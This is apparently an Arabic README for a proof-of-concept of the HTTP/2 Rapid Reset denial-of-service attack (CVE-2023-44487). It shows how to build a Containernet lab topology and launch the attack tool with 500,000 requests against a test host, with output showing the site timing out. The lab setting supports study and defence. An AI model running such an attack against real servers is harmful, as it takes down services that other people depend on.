
إثبات المفهوم لثغرة DDoS إعادة الضبط السريع في HTTP/2 - CVE-2023-44487
يوضح هذا المشروع هجوم حجب الخدمة (DoS) عبر HTTP/2 Rapid Reset باستخدام طوبولوجيا شبكة مخصصة تم إنشاؤها باستخدام Containernet. يستغل الهجوم ثغرات في بروتوكول HTTP/2 لإغراق الخادم الهدف، مما يجعله غير قادر على الاستجابة.

لتثبيت الحزم اللازمة، قم بتشغيل الأوامر التالية:
./install.sh
لتغيير دليل التثبيت الافتراضي، يمكنك تعديل متغير INSTALL_DIR على النحو التالي:
INSTALL_DIR=/custom/path ./install.sh
لبدء تشغيل البنية التحتية، قم بتشغيل الأوامر التالية:
source ~/.containernet/containernet/venv/bin/activate
sudo -E env PATH=$PATH ./topo.py
لبدء الهجوم، قم بتنفيذ الأمر التالي في حاوية المهاجم:
./attacker -url='https://modern.art:443/api' -requests=500000
بعد لحظات قليلة، عند محاولة الوصول إلى الموقع باستخدام curl، يصبح غير مستجيب.
root@attacker:/attacker# curl -k https://modern.art/
curl: (28) SSL connection timeout
لإيقاف البنية التحتية، ما عليك سوى إدخال exit في الطرفية التي يعمل فيها topo.py.